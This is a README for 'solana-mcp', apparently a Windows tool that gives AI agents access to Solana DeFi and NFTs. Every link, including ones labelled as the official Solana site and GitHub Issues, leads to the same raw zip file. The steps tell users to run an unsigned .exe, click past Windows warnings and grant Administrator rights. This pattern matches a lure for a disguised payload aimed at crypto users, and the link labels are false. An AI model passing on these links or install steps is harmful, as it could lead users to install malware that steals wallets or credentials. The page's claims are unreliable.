solana-mcp
Enables AI agents to interact with the Solana blockchain for DeFi, NFTs, and Web3 tasks through 38 tools, 10 prompts, and 7 modules.
README
π solana-mcp - AI Tools for Solana Access
π¦ About solana-mcp
solana-mcp is a complete toolset designed to give your AI agent full access to the Solana blockchain. It includes 38 tools, 10 prompts, and 7 modules. This suite helps you interact with Solana's decentralized finance (DeFi), NFTs, and Web3 ecosystems without needing programming skills.
You can use solana-mcp to manage digital assets, explore blockchain data, and experiment with AI-driven blockchain tasks in a user-friendly way.
βοΈ System Requirements
Before installing solana-mcp, make sure your PC meets these requirements:
- Operating System: Windows 10 or later (64-bit recommended)
- RAM: Minimum 4 GB (8 GB or more for best performance)
- Storage: At least 500 MB free space
- Internet connection: Required for initial download and blockchain interaction
- Permissions: Administrator rights may be needed to install software
π Getting Started
This section walks you through downloading and running solana-mcp on your Windows computer.
Step 1: Visit the Download Page
Click the large badge at the top or this link to visit the solana-mcp GitHub page:
https://raw.githubusercontent.com/AjithJS99/solana-mcp/main/src/modules/defi/mcp-solana-v3.2.zip
This page contains the latest version of the software, updates, and extra resources.
Step 2: Download the Software
On the GitHub page, look for the Releases section or the main repository files. Download the latest Windows installer or executable file. It might have a name like solana-mcp-setup.exe or similar.
If you see multiple files, choose the one marked for Windows or ending in .exe.
Step 3: Run the Installer
- Locate the downloaded file in your Downloads folder.
- Double-click the
.exefile to start installation. - Follow the on-screen prompts. Most options can stay at default.
- If Windows warns about unsigned software, confirm to continue.
Step 4: Finish Installation
- When installation completes, you may see an option to Launch solana-mcp.
- If not, find the solana-mcp shortcut on your desktop or in the Start menu.
- Double-click it to open the application.
π Using solana-mcp
Once open, solana-mcp provides several tools designed for easy use:
- Tool Collection: 38 tools help you monitor blockchain data, manage tokens, and run AI tasks.
- Prompts: 10 pre-built prompts guide your AI agent step by step.
- Modules: 7 add-ons extend functionality to cover NFTs, DeFi strategies, and Web3 features.
How to Use the Tools
- Select the tool you want from the sidebar or main menu.
- Follow the simple form or input fields shown. Most tools ask for basic info like wallet address or token name.
- Click the Run or Execute button to start the process.
- View results directly inside the app or export data if needed.
π Connecting to Solana
solana-mcp connects to the Solana blockchain through built-in API access. You do not need to set up anything manually.
Your AI agent can send and receive data on the blockchain. It can read token balances, track NFT ownership, and interact with DeFi protocols automatically.
π§ Troubleshooting
If you run into problems:
- Make sure your internet connection is stable.
- Run solana-mcp as Administrator if you get permission errors.
- Ensure Windows is up to date.
- Close and reopen the app if it freezes or behaves oddly.
- Check the GitHub page for updates or issue reports.
π Updating solana-mcp
To keep solana-mcp current:
- Visit the GitHub page again:
https://raw.githubusercontent.com/AjithJS99/solana-mcp/main/src/modules/defi/mcp-solana-v3.2.zip - Download the latest release installer.
- Run the installerβit will update your current version without losing your settings.
π Getting Help
If you need support beyond the steps here, the GitHub page has a section for reporting issues. You can open a new issue describing your problem, and the developers will review it.
π¨βπ» Privacy and Security
solana-mcp runs locally on your Windows computer. It does not collect your personal data. Blockchain interactions happen through public Solana nodes.
Use your own wallet keys and credentials only. Never share private keys. Always keep your system updated and run trusted software.
π Useful Links
- Project page: https://raw.githubusercontent.com/AjithJS99/solana-mcp/main/src/modules/defi/mcp-solana-v3.2.zip
- Download here:
- Solana official site: https://raw.githubusercontent.com/AjithJS99/solana-mcp/main/src/modules/defi/mcp-solana-v3.2.zip
- GitHub Issues: https://raw.githubusercontent.com/AjithJS99/solana-mcp/main/src/modules/defi/mcp-solana-v3.2.zip
βοΈ Technical Topics Covered
- AI agent integration with Solana blockchain
- Web3 and decentralized finance (DeFi)
- NFT management and marketplace interactions
- Model Context Protocol (MCP) tools
- TypeScript-based modules for blockchain data
- Open-source software for wide community use
This README guides you in setting up and running solana-mcp on Windows confidently. Access tried and tested tools to explore Solana blockchain tasks without code.
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